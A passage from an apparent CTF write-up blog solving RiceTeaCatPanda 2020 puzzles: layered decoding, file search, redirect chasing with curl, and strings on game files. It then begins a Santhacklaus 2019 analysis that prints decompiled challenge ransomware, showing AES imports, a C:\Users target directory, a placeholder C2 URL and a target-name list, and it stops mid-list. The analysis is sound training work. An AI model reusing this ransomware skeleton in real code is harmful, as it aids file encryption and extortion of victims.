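    if all(HEX_PAIR.match(t) for t in tokens):
        return "hex", bytes.fromhex("".join(tokens)).decode("latin-1")
    if all(OCTAL.match(t) for t in tokens):
        candidate = "".join(chr(int(t, 8)) for t in tokens)
        if printable(candidate):  # octal digits are also decimal digits
            return "octal", candidate
    if all(DECIMAL.match(t) and int(t) < 256 for t in tokens):
        return "decimal", "".join(chr(int(t)) for t in tokens)
    if len(tokens) == 1 and B64.match(tokens[0]):
        padded = tokens[0] + "=" * (-len(tokens[0]) % 4)  # restore dropped '='
        try:
            return "base64", base64.b64decode(padded, validate=True).decode("latin-1")
        except (binascii.Error, ValueError):
            return None
    return None


def peel(text, stop_marker="rtcp{", max_layers=10):
    """Decode layer after layer; returns the list of (layer_name, result)."""
    steps, current = [], text.strip()
    for _ in range(max_layers):
        if stop_marker in current:
            break
        layer = decode_layer(current)
        if layer is None:
            break
        steps.append(layer)
        current = layer[1].strip()
    return steps


# The number list handed out by the challenge, split over several lines.
CHALLENGE_INPUT = (
    "31 34 33 20 31 35 36 20 31 32 32 20 31 35 32 20 31 34 33 20 31 31 30 20 "
    "31 36 34 20 31 35 32 20 31 31 35 20 31 30 37 20 36 35 20 36 32 20 "
    "31 31 35 20 36 33 20 31 31 32 20 31 37 32 20 31 31 35 20 31 32 34 20 "
    "31 30 32 20 31 36 35 20 31 34 33 20 36 31 20 37 31 20 31 35 30 20 "
    "31 34 33 20 31 35 32 20 31 31 36 20 31 34 36 20 31 31 36 20 31 30 36 20 "
    "37 31 20 31 35 32 20 31 31 35 20 31 30 34 20 31 30 32 20 31 31 35 20 "
    "31 33 30 20 36 32 20 31 31 35 20 36 30 20 31 34 34 20 31 31 30 20 "
    "31 31 36 20 37 31"
)

if __name__ == "__main__":
    for name, result in peel(CHALLENGE_INPUT):
        print(f"{name:7} -> {result}")
```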
<h2>One line version</h2>
<div class="highlight"><pre><span></span><code>$ <span class="nb">printf</span> <span class="k">$(</span><span class="nb">echo</span> <span class="s2">"31 34 33 20 31 35 36 20 31 32 32 20 31 35 32 20 31 34 33 20 31 31 30 20 31 36 34 20 31 35 32 20 31 31 35 20 31 30 37 20 36 35 20 36 32 20 31 31 35 20 36 33 20 31 31 32 20 31 37 32 20 31 31 35 20 31 32 34 20 31 30 32 20 31 36 35 20 31 34 33 20 36 31 20 37 31 20 31 35 30 20 31 34 33 20 31 35 32 20 31 31 36 20 31 34 36 20 31 31 36 20 31 30 36 20 37 31 20 31 35 32 20 31 31 35 20 31 30 34 20 31 30 32 20 31 31 35 20 31 33 30 20 36 32 20 31 31 35 20 36 30 20 31 34 34 20 31 31 30 20 31 31 36 20 37 31"</span> <span class="p">|</span> xxd -r -p <span class="p">|</span> sed -E <span class="s1">'s/^(.*)/\\\1/'</span> <span class="p">|</span> sed <span class="s1">'s/ /\\/g'</span><span class="k">)</span> <span class="p">|</span> base64 -d
rtcp<span class="o">{</span>c0nv3rs10ns_ar3_4_c00L_c4ts<span class="o">}</span>
</code></pre></div>
<h1>RTCP - That's Some Interesting Tea(rs)</h1>
<p><em>2020-01-25 - nlegall - <a href="/rtcp-thats-some-interesting-tears.html">/rtcp-thats-some-interesting-tears.html</a></em></p>
<p><em>solves : 177</em></p>
<div class="highlight"><pre><span></span><code>Point : 175
You know, the tears of one's enemies works lovely in tea. Turns out, there's tons of different bases for tea. In fact, I think I heard Delphine talk about this chef website she used for her tea base combinations...
Oh! Speaking of which, GIANt wants Delphine to make him tea... all he has is the tea leaves and the cup though. Maybe you can help Delphine, since she's really busy with cooking other things?
O53GG4CSJRHEWQT2GJ5HC4CGOM4VKY3SOZGECZ2YNJTXO6LROV3DIR3CK4ZEMWCDHFMTOWSXGRSHU23DLJVTS5BXOQZXMU3ONJSFKRCVO5BEGVSELJSGUNSYLI2XQ32UOI3FKWDYMJQWOMKQOJ4XIU2WN5KTKWT2INUW44SZONGUUN2BMFRTQQJYKM3WGSSUNVXGEU3THFIFUSDHIVWVEQ3LJVUXEMSXK5MXSZ3TG5JXORKTMZRFIVQ=
</code></pre></div>
<p>The description gives us some clues : we are looking for the "chef" website and for combinations. The well-known website <a href="https://gchq.github.io/CyberChef/">CyberChef</a> lets you run a bunch of encodings/decodings and encryptions/decryptions on texts and files directly online.</p>
<p>Ok, we have the website! Now we have to figure out which encodings were used. We paste the text and CyberChef already suggests some "recipes" for this input : <code>base32</code> and <code>base58</code>. Hum, it seems to use only <code>base</code> encodings, chained together. We can add the other base encodings available on the website :</p>
<table>
<thead>
<tr>
<th>Text</th>
<th>Base used</th>
<th>Result</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>O53GG4CSJRHEWQT2[...]XORKTMZRFIVQ=</code></td>
<td>base32</td>
<td><code>wvcpRLNKBz2zqpFs[...]Yygs7SwESfbTV</code></td>
</tr>
<tr>
<td><code>wvcpRLNKBz2zqpFs[...]Yygs7SwESfbTV</code></td>
<td>base58</td>
<td><code>BGJz4dCH0UuQZ2Q9[...]iOvz2DYGDb9dh</code></td>
</tr>
<tr>
<td><code>BGJz4dCH0UuQZ2Q9[...]iOvz2DYGDb9dh</code></td>
<td>base62</td>
<td><code>RWNiZjFIWldwWEY+[...]kV0Y+R2FvRisi</code></td>
</tr>
<tr>
<td><code>RWNiZjFIWldwWEY+[...]kV0Y+R2FvRisi</code></td>
<td>base64</td>
<td><code>Ecbf1HZWpXF>[D_0[...]0QT$WF>GaoF+"</code></td>
</tr>
<tr>
<td><code>Ecbf1HZWpXF>[D_0[...]0QT$WF>GaoF+"</code></td>
<td>base85</td>
<td><code>rtcp{th4t5_50m3_54lty_t34_1_bl4m3_4ll_th0s3_t34rs}</code></td>
</tr>
</tbody>
</table>
<p>If you didn't know about this website, I recommend bookmarking it. Its automatic detection can help you find which encoding was used in some cases.</p>
<h1>RTCP - Treeeeeeee</h1>
<p><em>2020-01-25 - nlegall - <a href="/rtcp-treeeeeeee.html">/rtcp-treeeeeeee.html</a></em></p>
<p><em>solves : 38</em></p>
<div class="highlight"><pre><span></span><code>Point : 200
It appears that my cat has gotten itself stuck in a tree... It's really tall and I can't seem to reach it. Maybe you can throw a snake at the tree to find it?
Oh, you want to know what my cat looks like? I put a picture in the hints.
</code></pre></div>
<p>We got a 7z archive. Let's unpack it!</p>
<div class="highlight"><pre><span></span><code>$ 7z e treemycatisin.7z
<span class="m">7</span>-Zip <span class="o">[</span><span class="m">64</span><span class="o">]</span> <span class="m">16</span>.02 : Copyright <span class="o">(</span>c<span class="o">)</span> <span class="m">1999</span>-2016 Igor Pavlov : <span class="m">2016</span>-05-21
p7zip Version <span class="m">16</span>.02 <span class="o">(</span><span class="nv">locale</span><span class="o">=</span>fr_FR.UTF-8,Utf16<span class="o">=</span>on,HugeFiles<span class="o">=</span>on,64 bits,8 CPUs Intel<span class="o">(</span>R<span class="o">)</span> Core<span class="o">(</span>TM<span class="o">)</span> i7-8550U CPU @ <span class="m">1</span>.80GHz <span class="o">(</span>806EA<span class="o">)</span>,ASM,AES-NI<span class="o">)</span>
Scanning the drive <span class="k">for</span> archives:
<span class="m">1</span> file, <span class="m">266897</span> bytes <span class="o">(</span><span class="m">261</span> KiB<span class="o">)</span>
Extracting archive: treemycatisin.7z
--
<span class="nv">Path</span> <span class="o">=</span> treemycatisin.7z
<span class="nv">Type</span> <span class="o">=</span> 7z
Physical <span class="nv">Size</span> <span class="o">=</span> <span class="m">266897</span>
Headers <span class="nv">Size</span> <span class="o">=</span> <span class="m">261108</span>
<span class="nv">Method</span> <span class="o">=</span> LZMA2:3m
<span class="nv">Solid</span> <span class="o">=</span> +
<span class="nv">Blocks</span> <span class="o">=</span> <span class="m">1</span>
Everything is Ok
Folders: <span class="m">27848</span>
Files: <span class="m">1337</span>
Size: <span class="m">2146274</span>
Compressed: <span class="m">266897</span>
</code></pre></div>
<p>We have a bunch of folders and files. It would be impossible to go through all of them by hand.</p>
<div class="highlight"><pre><span></span><code>$ ls -al
total <span class="m">5348</span>
drwxr-xr-x <span class="m">27849</span> nlegall nlegall <span class="m">583720</span> janv. <span class="m">27</span> <span class="m">19</span>:30 .
drwxr-xr-x <span class="m">3</span> nlegall nlegall <span class="m">160</span> janv. <span class="m">27</span> <span class="m">19</span>:28 ..
drwx------ <span class="m">2</span> nlegall nlegall <span class="m">40</span> sept. <span class="m">19</span> <span class="m">18</span>:23 003Q6
drwx------ <span class="m">2</span> nlegall nlegall <span class="m">40</span> sept. <span class="m">19</span> <span class="m">18</span>:23 004P77DAN
drwx------ <span class="m">2</span> nlegall nlegall <span class="m">40</span> sept. <span class="m">19</span> <span class="m">18</span>:23 007CXMN
<span class="o">[</span>...<span class="o">]</span>
drwx------ <span class="m">2</span> nlegall nlegall <span class="m">40</span> sept. <span class="m">19</span> <span class="m">18</span>:23 ZZXJO9L
drwx------ <span class="m">2</span> nlegall nlegall <span class="m">40</span> sept. <span class="m">19</span> <span class="m">18</span>:23 ZZYSGJ8
drwx------ <span class="m">2</span> nlegall nlegall <span class="m">40</span> sept. <span class="m">19</span> <span class="m">18</span>:23 ZZZGZF3L
</code></pre></div>
<p>The <code>find</code> command is your best friend here. The only files are <code>.jpg</code> files. Let's find them all and check the size of each. To make it easier to read, we can <code>sort</code> and <code>uniq</code> them to count how many times each file size occurs.</p>
<div class="highlight"><pre><span></span><code>$ find . -name <span class="s2">"*.jpg"</span> -exec ls -ld <span class="o">{}</span> <span class="se">\;</span> <span class="p">|</span> awk <span class="s1">'{print $5}'</span> <span class="p">|</span> sort -n <span class="p">|</span> uniq -c
<span class="m">681</span> <span class="m">1496</span>
<span class="m">655</span> <span class="m">1718</span>
<span class="m">1</span> <span class="m">2208</span>
$ find . -name <span class="s2">"*.jpg"</span> -exec ls -ld <span class="o">{}</span> <span class="se">\;</span> <span class="p">|</span> grep <span class="m">2208</span>
-rw-r--r-- <span class="m">1</span> nlegall nlegall <span class="m">2208</span> sept. <span class="m">19</span> <span class="m">19</span>:20 ./ENP92.jpg
</code></pre></div>
<p>Hum, only one of them has a size of <code>2208</code>.</p>
<p><img alt="ENP92.jpg" src="https://blog.nlegall.fr/images/rtcp/ENP92.jpg"></p>
<p>Let's read the image and get the flag : <code>rtcp{meow_sharp_pidgion_rice_tree}</code>.</p>
<h1>RTCP - Uwu?</h1>
<p><em>2020-01-25 - nlegall - <a href="/rtcp-uwu.html">/rtcp-uwu.html</a></em></p>
<p><em>solves : 401</em></p>
<div class="highlight"><pre><span></span><code>Point : 125
ᵘʷᵘ oh no ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ hecc sorry guys ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ sorry im dropping ᵘʷᵘ my uwus all over the ᵘʷᵘ place ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ oh no I lost one ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ
ah, Jake, you idiot
Hint: https://riceteacatpanda.wtf/uwu
Hint 2: This challenge gets progressively harder the faster your internet is if you do it manually
</code></pre></div>
<p>We visit the link and get a bunch of redirections (5 in total). They come from an HTML meta refresh : <code>&lt;meta http-equiv="Refresh" content="0; url=/omgmeow" /&gt;</code>.</p>
<ul>
<li>https://riceteacatpanda.wtf/uwu</li>
<li>https://riceteacatpanda.wtf/omgmeow</li>
<li>https://riceteacatpanda.wtf/pandaaaaaaa</li>
<li>https://riceteacatpanda.wtf/you-better-wash-your-rice</li>
<li>https://riceteacatpanda.wtf/footprint</li>
<li>https://riceteacatpanda.wtf/uwustorage</li>
</ul>
<p>We have different ways to do it.</p>
<h2>From the web browser</h2>
<p>We can use the developer tools inside the web browser to log all the requests made. For each request, we can look inside the response and check with CTRL+F whether the content contains the flag.</p>
<p><img alt="uwu.png" src="https://blog.nlegall.fr/images/rtcp/uwu.png"></p>
<h2>CLI</h2>
<p>We can <code>curl</code> each page to check whether the flag is inside and get the next page to check.</p>
<div class="highlight"><pre><span></span><code>$ curl -s https://riceteacatpanda.wtf/uwu <span class="p">|</span> grep -i rtcp
$ curl -s https://riceteacatpanda.wtf/uwu <span class="p">|</span> grep -i Refresh
&lt;p&gt;&lt;meta http-equiv<span class="o">=</span><span class="s2">"Refresh"</span> <span class="nv">content</span><span class="o">=</span><span class="s2">"0; url=/omgmeow"</span> /&gt;
$ curl -s https://riceteacatpanda.wtf/omgmeow <span class="p">|</span> grep -i rtcp
$ curl -s https://riceteacatpanda.wtf/omgmeow <span class="p">|</span> grep -i Refresh
&lt;p&gt;&lt;meta http-equiv<span class="o">=</span><span class="s2">"Refresh"</span> <span class="nv">content</span><span class="o">=</span><span class="s2">"0; url=/pandaaaaaaa"</span> /&gt;
$ curl -s https://riceteacatpanda.wtf/pandaaaaaaa <span class="p">|</span> grep -i rtcp
$ curl -s https://riceteacatpanda.wtf/pandaaaaaaa <span class="p">|</span> grep -i Refresh
&lt;p&gt;&lt;meta http-equiv<span class="o">=</span><span class="s2">"Refresh"</span> <span class="nv">content</span><span class="o">=</span><span class="s2">"0; url=/you-better-wash-your-rice"</span> /&gt;
$ curl -s https://riceteacatpanda.wtf/you-better-wash-your-rice <span class="p">|</span> grep -i rtcp
uWu uWu UWU UʷU uWu<span class="o">[</span>...<span class="o">]</span>rtcp<span class="o">{</span>uwu_,_1_f0und_y0u<span class="o">}[</span>...<span class="o">]</span>UʷU uWu ᵘWᵘ&lt;/p&gt;
</code></pre></div>
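<p>An added example, not code from the original post, that follows a chain of HTML meta refresh redirects and stops at the flag, a dead end or a loop; it runs against a constructed in-memory copy of the pages (the host <code>example.invalid</code> is a placeholder), so it works offline.</p>

```python
"""Follow HTML meta refresh redirects until a flag, a dead end or a loop.

Added example, not code from the original write-up. `fetch` is an offline
stand-in that serves a constructed copy of the challenge pages from a dict;
the host example.invalid is a placeholder. Swap `fetch` for a real HTTP GET
to run it against a live site.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin

FLAG_RE = re.compile(r"rtcp\{[^}]*\}")
URL_IN_CONTENT = re.compile(r"url\s*=\s*['\"]?([^'\"\s;]+)", re.IGNORECASE)


class MetaRefreshParser(HTMLParser):
    """Collect targets of <meta http-equiv="Refresh" content="0; url=..."> tags."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        attrs = {name.lower(): (value or "") for name, value in attrs}
        if attrs.get("http-equiv", "").lower() != "refresh":
            return
        match = URL_IN_CONTENT.search(attrs.get("content", ""))
        if match:
            self.targets.append(match.group(1))


def meta_refresh_target(html):
    """First meta refresh target in the page, or None."""
    parser = MetaRefreshParser()
    parser.feed(html)
    return parser.targets[0] if parser.targets else None


BASE = "https://example.invalid"  # placeholder host for the offline run

# Constructed pages: the redirect chain from the write-up, a two-page loop,
# and the flag page (flag text as shown in the write-up).
FAKE_SITE = {
    "/uwu": '<html><head><meta http-equiv="Refresh" content="0; url=/omgmeow" /></head></html>',
    "/omgmeow": '<meta http-equiv="Refresh" content="0; url=/pandaaaaaaa" />',
    "/pandaaaaaaa": '<meta http-equiv="Refresh" content="0; url=/you-better-wash-your-rice" />',
    "/you-better-wash-your-rice": "<p>uWu uWu UWU rtcp{uwu_,_1_f0und_y0u} UʷU uWu</p>",
    "/loop-a": '<meta http-equiv="Refresh" content="0; url=/loop-b" />',
    "/loop-b": '<meta http-equiv="Refresh" content="0; url=/loop-a" />',
}


def fetch(url):
    """Offline stand-in for an HTTP GET: returns the body, or None for 404."""
    path = url[len(BASE):] if url.startswith(BASE) else url
    return FAKE_SITE.get(path)


def follow_chain(start_url, fetch=fetch, max_hops=50):
    """Walk the redirect chain; returns (visited_urls, flag_or_None).

    Stops on the first page containing a flag, on a missing page, on a page
    without a meta refresh, on a URL seen before (loop) or after max_hops.
    """
    visited, seen, url = [], set(), start_url
    while url not in seen and len(visited) < max_hops:
        seen.add(url)
        visited.append(url)
        body = fetch(url)
        if body is None:
            break
        match = FLAG_RE.search(body)
        if match:
            return visited, match.group(0)
        target = meta_refresh_target(body)
        if target is None:
            break
        url = urljoin(url, target)  # relative targets resolve against the page
    return visited, None


if __name__ == "__main__":
    print(follow_chain(BASE + "/uwu"))
```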
<h2>BURP</h2>
<p>to-do</p>
<h1>RTCP - Web Invaders</h1>
<p><em>2020-01-25 - nlegall - <a href="/rtcp-web-invaders.html">/rtcp-web-invaders.html</a></em></p>
<p><em>solves : 38</em></p>
<div class="highlight"><pre><span></span><code>Point : 250
https://jef1056.github.io/
</code></pre></div>
<p>It's a web game built with <a href="https://defold.com/">Defold</a>, like the mythical <a href="https://en.wikipedia.org/wiki/Space_Invaders">Space Invaders</a>. You can try to beat the first level but, even with this achievement, the flag will not appear.</p>
<p>Let's try to inspect all the files downloaded during the game loading :</p>
<p><img alt="webinvaders.png" src="https://blog.nlegall.fr/images/rtcp/webinvaders.png"></p>
<p>You can save the page from the browser or <code>wget</code>/<code>curl</code> each file. Let's take <code>game.arcd0</code>, which is the biggest game file:</p>
<div class="highlight"><pre><span></span><code>$ strings game.arcd0 <span class="p">|</span> grep -i rtcp
rtcp<span class="o">{</span>web
$ strings game.arcd0 <span class="p">|</span> grep -i rtcp -C <span class="m">3</span>
sdfdsfsdf
messag
curtain
rtcp<span class="o">{</span>web
_h^ck3r_
<span class="m">0004212</span><span class="o">}</span>
B!/builtins/materials/gui.
</code></pre></div>
<p>And finally, we got the flag: <code>rtcp{web_h^ck3r_0004212}</code>.</p>
<h1>RTCP - Work In Progress</h1>
<p><em>2020-01-25 - nlegall - <a href="/rtcp-work-in-progress.html">/rtcp-work-in-progress.html</a></em></p>
<p><em>solves : 138</em></p>
<div class="highlight"><pre><span></span><code>Point : 400
I was asked to beta-test this game, but it's so incomplete, it's kind of doesn't even have a goal... The developer said there's a flag, though, so I guess I'll just leave you to it!
Hint: Have you ever played Skyrim? Well, you don't need a horse for this one.
</code></pre></div>
<p>Unlike <a href="/rtcp-tea-clicker.html">Tea Clicker</a>, we can't get the flag with tools that inspect the RAM. We need to find a way inside the game.</p>
<p>If you go right, you will have some monsters to fight. But they can't die: when their life gauge is empty, it starts filling up again with every hit. So, definitely not the right way.</p>
<p><img alt="wip1.png" src="https://blog.nlegall.fr/images/rtcp/wip1.png"></p>
<p>So, let's close and reopen the game and go to the left. We face a huge wall.</p>
<p><img alt="wip2.png" src="https://blog.nlegall.fr/images/rtcp/wip2.png"></p>
<p>You can climb it using the jump and left keys.</p>
<p><img alt="wip3.png" src="https://blog.nlegall.fr/images/rtcp/wip3.png"></p>
<p>When you reach the top, let yourself fall until the flag shows up in the upper right corner:</p>
<p><img alt="wip4.png" src="https://blog.nlegall.fr/images/rtcp/wip4.png"></p>
<p>So the flag is: <code>rtcp{Th3_qu1ck_br0WN_^dv3nturEr_jump$_0v3r_ThE_l^zy_cL1ff}</code>.</p>
<h1>RTCP - Wrong Way</h1>
<p><em>2020-01-25 - nlegall - <a href="/rtcp-wrong-way.html">/rtcp-wrong-way.html</a></em></p>
<p><em>solves : 129</em></p>
<div class="highlight"><pre><span></span><code>Point : 150
Did you know that you've been going the wrong way entire time?
</code></pre></div>
<p>Hum, the name is the best hint to solve this challenge. We usually decode/decrypt during a CTF but for this one, we need to encode!</p>
<p>However, some characters are not printable, so typing the string directly in the CLI does not give the expected result :</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> <span class="s2">"E7Rq<G:Kǒ"</span> <span class="p">|</span> base64
RTdScTxHOkvHkgo
</code></pre></div>
<p>We can put the content in a file with vim and <code>cat</code> it afterwards :</p>
<div class="highlight"><pre><span></span><code>$ cat a <span class="p">|</span> base64
RTcPUnEXPEcTEDpLAceS
</code></pre></div>
<p>The flag format needs to be added : <code>rtcp{UnEXPEcTED_pLAceS}</code>.</p>
<h1>Santhacklaus 2019 - Jacques ! Au secours !</h1>
<p><em>2019-12-31 - nlegall - <a href="/santhacklaus-2019-jacques-au-secours.html">/santhacklaus-2019-jacques-au-secours.html</a></em></p>
<p><em>solves : 57</em></p>
<div class="highlight"><pre><span></span><code>One of our VIP clients, who wishes to remain anonymous, has apparently been hacked and all their important documents are now corrupted.
Can you help us recover the files? We found a strange piece of software that might have caused all of this.
MD5 of the file : ccaab91b06fc9a77f3b98d2b9164df8e
</code></pre></div>
<h2>General information</h2>
<p>We are given an archive. Its contents can easily be listed with the <code>zipinfo</code> command:</p>
<div class="highlight"><pre><span></span><code>$ zipinfo chall_files.zip
Archive: chall_files.zip
Zip file size: <span class="m">399799</span> bytes, number of entries: <span class="m">8</span>
drwx--- <span class="m">3</span>.1 fat <span class="m">0</span> bx stor <span class="m">19</span>-Dec-10 <span class="m">16</span>:44 chall_files/
drwx--- <span class="m">3</span>.1 fat <span class="m">0</span> bx stor <span class="m">19</span>-Dec-10 <span class="m">16</span>:37 chall_files/vacation pictures/
-rw-a-- <span class="m">3</span>.1 fat <span class="m">174736</span> bx defN <span class="m">19</span>-Dec-10 <span class="m">16</span>:31 chall_files/vacation pictures/DCIM-0533.jpg.hacked
-rw-a-- <span class="m">3</span>.1 fat <span class="m">74368</span> bx defN <span class="m">19</span>-Dec-10 <span class="m">16</span>:31 chall_files/vacation pictures/DCIM-0534.jpg.hacked
-rw-a-- <span class="m">3</span>.1 fat <span class="m">88176</span> bx defN <span class="m">19</span>-Dec-10 <span class="m">16</span>:31 chall_files/vacation pictures/DCIM-0535.jpg.hacked
-rw-a-- <span class="m">3</span>.1 fat <span class="m">58400</span> bx defN <span class="m">19</span>-Dec-10 <span class="m">16</span>:31 chall_files/vacation pictures/DCIM-0536.jpg.hacked
-rw-a-- <span class="m">3</span>.1 fat <span class="m">76</span> bx defN <span class="m">19</span>-Dec-10 <span class="m">16</span>:31 chall_files/vacation pictures/READ_THIS.txt
-rw-a-- <span class="m">3</span>.1 fat <span class="m">3804</span> bx defN <span class="m">19</span>-Dec-10 <span class="m">16</span>:41 chall_files/virus.cpython-37.pyc
<span class="m">8</span> files, <span class="m">399560</span> bytes uncompressed, <span class="m">398247</span> bytes compressed: <span class="m">0</span>.3%
</code></pre></div>
<p>It contains the encrypted images (the originals must contain the flag) and a compiled Python script (<code>virus.cpython-37.pyc</code>). Keep in mind that compiled, unobfuscated Python code is very easy to reverse. Shipping the compiled version of a Python program is not a good idea at all, because the whole source can easily be recovered from it.</p>
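<p>To see why a <code>.pyc</code> gives so much away, here is an added example (my code, not the challenge's or the author's, standard library only): it parses the 16-byte header that CPython 3.7 and later write, which is where a decompiler reads the bytecode version and the "Size of source mod 2**32" shown in the <code>uncompyle6</code> banner, then unmarshals the code object and lists the function names and string constants without any decompiler. The sample module it compiles is constructed for the example and stands in for <code>virus.py</code>.</p>
<div class="highlight"><pre><span></span><code>
```python
import dis
import importlib.util
import marshal
import os
import py_compile
import struct
import tempfile
import types

# Constructed sample module: stands in for the challenge's virus.py, not its real code
SAMPLE_SOURCE = (
    'C2_URL = "https://c2.example.invalid/"\n'
    'def lock_file(path):\n'
    '    return path + ".hacked"\n'
)


def build_sample_pyc() -> str:
    """Compile the sample with the running interpreter and return the .pyc path."""
    workdir = tempfile.mkdtemp()
    src = os.path.join(workdir, "sample.py")
    with open(src, "w", newline="\n") as f:
        f.write(SAMPLE_SOURCE)
    return py_compile.compile(
        src,
        cfile=os.path.join(workdir, "sample.pyc"),
        doraise=True,
        invalidation_mode=py_compile.PycInvalidationMode.TIMESTAMP,
    )


def parse_pyc(path: str) -> dict:
    """Read the 16-byte header CPython >= 3.7 writes, then unmarshal the code object.

    marshal only reliably reads data produced by the same interpreter version, so the
    magic number is checked first: it identifies the Python that compiled the file
    (uncompyle6 reports it as "Python bytecode 3.7").
    """
    with open(path, "rb") as f:
        data = f.read()
    magic = data[:4]
    (flags,) = struct.unpack("<I", data[4:8])
    word1, word2 = struct.unpack("<II", data[8:16])
    info = {
        "magic": magic,
        "same_version_as_interpreter": magic == importlib.util.MAGIC_NUMBER,
        "flags": flags,
    }
    if flags & 0x1:
        # hash-based pyc: the 8 bytes are a SipHash of the source, not mtime/size
        info["source_hash"] = data[8:16]
    else:
        info["source_mtime"] = word1
        info["source_size"] = word2  # "Size of source mod 2**32" in the uncompyle6 banner
    if info["same_version_as_interpreter"]:
        info["code"] = marshal.loads(data[16:])
    return info


def function_names(code: types.CodeType) -> list:
    """Names of the functions defined at module level."""
    return [c.co_name for c in code.co_consts if isinstance(c, types.CodeType)]


def string_constants(code: types.CodeType) -> set:
    """Every str constant reachable from the code object, nested functions included."""
    found = set()
    for c in code.co_consts:
        if isinstance(c, str):
            found.add(c)
        elif isinstance(c, types.CodeType):
            found |= string_constants(c)
    return found


if __name__ == "__main__":
    info = parse_pyc(build_sample_pyc())
    print("magic:", info["magic"].hex(), "source size:", info.get("source_size"))
    print("functions:", function_names(info["code"]))
    print("strings:", sorted(string_constants(info["code"])))
    dis.dis(info["code"])  # bytecode listing: the raw material a decompiler works from
```
</code></pre></div>
<p>For a real sample, the string constants alone (a C2 URL, a file extension, a ransom note) are usually enough to triage the file before spending time on a full decompilation.</p>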
<h2>Recovering the source</h2>
<p>The <code>uncompyle6</code> command (<a href="https://pypi.org/project/uncompyle6/">https://pypi.org/project/uncompyle6/</a>) supports every Python version (from 1.0 to 3.8) and works very well.</p>
<div class="highlight"><pre><span></span><code>$ uncompyle6 virus.cpython-37.pyc > virus.cpython-37.py
</code></pre></div>
<p>It gives us the following source code:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># uncompyle6 version 3.6.1</span>
<span class="c1"># Python bytecode 3.7 (3394)</span>
<span class="c1"># Decompiled from: Python 3.8.1 (default, Dec 21 2019, 20:57:38) </span>
<span class="c1"># [GCC 9.2.0]</span>
<span class="c1"># Embedded file name: /mnt/c/Users/Mat/Documents/_CTF/Santhacklaus/2019/virus.py</span>
<span class="c1"># Size of source mod 2**32: 3473 bytes</span>
<span class="kn">from</span> <span class="nn">Crypto.Cipher</span> <span class="kn">import</span> <span class="n">AES</span>
<span class="kn">from</span> <span class="nn">Crypto.Random</span> <span class="kn">import</span> <span class="n">get_random_bytes</span>
<span class="kn">import</span> <span class="nn">hashlib</span><span class="o">,</span> <span class="nn">os</span><span class="o">,</span> <span class="nn">getpass</span><span class="o">,</span> <span class="nn">requests</span>
<span class="n">TARGET_DIR</span> <span class="o">=</span> <span class="s1">'C:</span><span class="se">\\</span><span class="s1">Users'</span>
<span class="n">C2_URL</span> <span class="o">=</span> <span class="s1">'https://c2.virus.com/'</span>
<span class="n">TARGETS</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'Scott Farquhar'</span><span class="p">,</span> <span class="s1">'Lei Jun'</span><span class="p">,</span> <span class="s1">'Reid Hoffman'</span><span class="p">,</span> <span class="s1">'Zhou Qunfei'</span><span class="p">,</span> <span class="s1">'Jeff Bezos'</span><span class="p">,</span> <span class="s1">'Shiv Nadar'</span><span class="p">,</span> <span class="s1">'Simon Xie'</span><span class="p">,</span> <span class="s1">'Ma Huateng'</span><span class="p">,</span> <span class="s1">'Ralph Dommermuth'</span><span class="p">,</span> <span class="s1">'Barry Lam'</span><span class="p">,</span> <span class="s1">'Nathan Blecharczyk'</span><span class="p">,</span> <span class="s1">'Judy Faulkner'</span><span class="p">,</span> <span class="s1">'William Ding'</span><span class="p">,</span> <span class="s1">'Scott Cook'</span><span class="p">,</span> <span class="s1">'Gordon Moore'</span><span class="p">,</span> <span class="s1">'Marc Benioff'</span><span class="p">,</span> <span class="s1">'Michael Dell'</span><span class="p">,</span> <span class="s1">'Yusaku Maezawa'</span><span class="p">,</span> <span class="s1">'Yuri Milner'</span><span class="p">,</span> <span class="s1">'Bobby Murphy'</span><span class="p">,</span> <span class="s1">'Larry Page'</span><span class="p">,</span> <span class="s1">'Henry Samueli'</span><span class="p">,</span> <span class="s1">'Jack Ma'</span><span class="p">,</span> <span class="s1">'Jen-Hsun Huang'</span><span class="p">,</span> <span class="s1">'Jay Y. Lee'</span><span class="p">,</span> <span class="s1">'Joseph Tsai'</span><span class="p">,</span> <span class="s1">'Dietmar Hopp'</span><span class="p">,</span> <span class="s1">'Henry Nicholas, III.'</span><span class="p">,</span> <span class="s1">'Dustin Moskovitz'</span><span class="p">,</span> <span class="s1">'Mike Cannon-Brookes'</span><span class="p">,</span> <span class="s1">'Robert Miller'</span><span class="p">,</span> <span class="s1">'Bill Gates'</span><span class="p">,</span> <span class="s1">'Garrett Camp'</span><span class="p">,</span> <span class="s1">'Lin Xiucheng'</span><span class="p">,</span> <span class="s1">'Gil Shwed'</span><span class="p">,</span> <span class="s1">'Sergey Brin'</span><span class="p">,</span> <span class="s1">'Rishi Shah'</span><span class="p">,</span> <span class="s1">'Denise Coates'</span><span class="p">,</span> <span class="s1">'Zhang Fan'</span><span class="p">,</span> <span class="s1">'Michael Moritz'</span><span class="p">,</span> <span class="s1">'Robin Li'</span><span class="p">,</span> <span class="s1">'Andreas von Bechtolsheim'</span><span class="p">,</span> <span class="s1">'Brian Acton'</span><span class="p">,</span> <span class="s1">'Sean Parker'</span><span class="p">,</span> <span class="s1">'John Doerr'</span><span class="p">,</span> <span class="s1">'David Cheriton'</span><span class="p">,</span> <span class="s1">'Brian Chesky'</span><span class="p">,</span> <span class="s1">'Wang Laisheng'</span><span class="p">,</span> <span class="s1">'Jan Koum'</span><span class="p">,</span> <span class="s1">'Jack Sheerack'</span><span class="p">,</span> <span class="s1">'Terry Gou'</span><span class="p">,</span> <span class="s1">'Adam Neumann'</span><span class="p">,</span> <span class="s1">'James Goodnight'</span><span class="p">,</span> <span class="s1">'Larry Ellison'</span><span class="p">,</span> <span 